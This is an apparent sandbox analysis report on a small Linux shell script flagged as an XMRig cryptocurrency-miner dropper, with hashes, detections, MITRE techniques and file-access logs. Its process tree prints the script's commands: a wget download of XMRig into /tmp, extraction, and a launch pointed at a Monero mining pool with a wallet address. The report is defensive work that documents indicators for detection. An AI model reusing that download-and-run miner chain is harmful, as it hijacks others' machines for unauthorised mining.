xmrig_linux | cac925a1b75eb4e0ab9d5be4399962febb10fa3f720ad07d0645183d7b051ffa

Analysis

max time kernel
1526s
max time network
1520s
platform
ubuntu-24.04_amd64
resource
ubuntu2404-amd64-20240523-en
resource tags

arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system
submitted
13-07-2024 18:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

triage.sh
Size

409B
MD5

82f2b8313ca94ab96c1c4dcef958a7e5
SHA1

610a6b6624debdcb9059f6d6dd6e4feba96e5793
SHA256

cac925a1b75eb4e0ab9d5be4399962febb10fa3f720ad07d0645183d7b051ffa
SHA512

d9bcdd0a0afe819c3bc4e6829d4d1e3ac9ee5fbc00c2dcb9b8aa8aedc84e5d3ef742c98d34b9f3ee135715fe9d62945ca2044a73c8a8b2f91b04f209a3fb0c39

Score

10^/10

xmrig_linux antivm miner

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/files/fstream-4.dat	family_xmrig
behavioral1/files/fstream-4.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/xmrig-6.17.0/xmrig	2472	xmrig

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	xmrig

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_name	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	xmrig

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened for reading	/proc/cpuinfo	xmrig

Reads CPU attributes 1 TTPs 2 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	xmrig
File opened for reading	/sys/devices/system/cpu/possible	xmrig

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/bus/dax/devices/target_node	xmrig
File opened for reading	/sys/devices/virtual/dmi/id	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_id	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/type	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/size	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	xmrig
File opened for reading	/sys/bus/cpu/devices	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/type	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/level	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/id	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/level	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size	xmrig
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages	xmrig
File opened for reading	/sys/fs/cgroup/cpuset.mems.effective	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map	xmrig
File opened for reading	/sys/bus/dax/target_node	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/die_cpus	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition	xmrig
File opened for reading	/sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages	xmrig
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages	xmrig
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_latency	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_cpus	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/type	xmrig
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	xmrig
File opened for reading	/sys/bus/node/devices/node0/access1/initiators	xmrig
File opened for reading	/sys/bus/node/devices/node0/access0/initiators	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size	xmrig
File opened for reading	/sys/bus/node/devices/node0/cpumap	xmrig
File opened for reading	/sys/bus/dax/devices	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq	xmrig
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_bandwidth	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages	xmrig
File opened for reading	/sys/fs/cgroup/cgroup.controllers	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/id	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/node/online	xmrig
File opened for reading	/sys/fs/cgroup/cpuset.cpus.effective	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/cluster_cpus	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/package_cpus	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/type	xmrig
File opened for reading	/sys/bus/node/devices/node0/meminfo	xmrig
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/level	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/id	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/level	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/size	xmrig
File opened for reading	/sys/firmware/dmi/tables/DMI	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cpu_capacity	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/id	xmrig

Reads runtime system information 7 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/meminfo	xmrig
File opened for reading	/proc/driver/nvidia/gpus	xmrig
File opened for reading	/proc/sys/crypto/fips_enabled	wget
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/sys/kernel/random/boot_id	tar
File opened for reading	/proc/mounts	xmrig
File opened for reading	/proc/self/cpuset	xmrig

Writes file to tmp directory 4 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/xmrig-6.17.0-linux-x64.tar.gz	wget
File opened for modification	/tmp/xmrig-6.17.0/xmrig	tar
File opened for modification	/tmp/xmrig-6.17.0/SHA256SUMS	tar
File opened for modification	/tmp/xmrig-6.17.0/config.json	tar

/tmp/triage.sh
/tmp/triage.sh
1⤵
PID:2460
- /usr/bin/wget
  wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:2461
- /usr/bin/tar
  tar xf xmrig-6.17.0-linux-x64.tar.gz
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:2468
- - /usr/local/sbin/gzip
    gzip -d
    3⤵
    PID:2469
- - /usr/local/bin/gzip
    gzip -d
    3⤵
    PID:2469
- - /usr/sbin/gzip
    gzip -d
    3⤵
    PID:2469
- - /usr/bin/gzip
    gzip -d
    3⤵
    PID:2469
- /usr/bin/clear
  clear
  2⤵
  PID:2470
- /usr/bin/nproc
  nproc
  2⤵
  PID:2471
- /tmp/xmrig-6.17.0/xmrig
  ./xmrig -o gulf.moneroocean.stream:10001 -u 47XoXb55DyecrQ1aaBnqXdZiDntoLvXpZTcd6g5mjLHqgx3yMvTTMccNdPnnZxoXA48DzFBGrjoVi4jko7bxTJbr6zZQjjZ -p Triage --cpu-priority 4 --threads 1
  2⤵
  - Executes dropped EXE
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/root/.wget-hsts

Filesize
165B

MD5
757eb280d040e2c818281c73e32254a3

SHA1
290c8a79f907df1ec91db09756d1eb27f8e78933

SHA256
0fb32af4bf1f95d3f1e1143c7c14e983203530ab6b313719051b697645c01e92

SHA512
c21b0fd5daabf18e319ec42c8679482569e118677aea85a93d47f70a3f531f9478e90e1b606256f509950ac8796d2d0b1aa177cd03753f1691dd4b86f31b84ba

Download Submit
/tmp/xmrig-6.17.0-linux-x64.tar.gz

Filesize
3.4MB

MD5
29451e2e516cb19a9d81a87c59e69f4f

SHA1
123a521ef3d37e9eeed6780abd70ec39813c136d

SHA256
75ce5d4d52c46a7c8c604e1de3549cba9dc4b07405d6598e12b6f21f50247739

SHA512
ed8b9a0afbafa3261996a2a42e95b07d404a1d362a79b43c764c3d2511957d90dd18c61329c6d341c9ec17b1713afba4db5ab2f9f452439cc878619b927fc992

Download Submit
/tmp/xmrig-6.17.0/SHA256SUMS

Filesize
150B

MD5
b2cf09dba10f008958364cee2d2b1aa4

SHA1
35e5d859b9671216b0040b423763260b517e145d

SHA256
a73b944844c3d1d87a7db4089cd36f59e7558ad4ff03f70ff88834dbb6ed65ac

SHA512
d55a79ef4c4d35ef24e14cebcaa900d778bd958fbad40be37fff22865dbaaca1fb6b40d443a3868504ce60f8cb241da38af289ff2f4b2219fd5f1810908d3b5a

Download Submit
/tmp/xmrig-6.17.0/config.json

Filesize
2KB

MD5
f7e601938baefd87b9b34c696009d6a5

SHA1
7573c2611f292b3e388db97c12fbc6a0473aa216

SHA256
23754944047dd29fd93d7a486bb19a087e33e7d59bddd92a7e20ac75f92697c9

SHA512
24c331a1af647b62a444b44c5af51e049a41099c302c98379d7e9d6049a7d87b9f74567fa181cccc3dbdac304da6564577fddd3c93a03f7ac70e74b8705dbb76

Download Submit
/tmp/xmrig-6.17.0/xmrig

Filesize
8.4MB

MD5
3e155071184350b2eeea4a8ba57ae593

SHA1
cf0ad2a3cec69835ee3fdbacb151dd46500afc6c

SHA256
403814fe99fe51861135c61dc723763da488ddd786521e3b5a8b280a966318f3

SHA512
aa1ca38cdf32a9d1ac5f26171fa0d78aaebc6b4ec9a6d4aaadb7825fbb1c1acb73883008b72eee7dedc38926ac2c18ae0e88e6c561a1b8434c365b9d48291f56

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads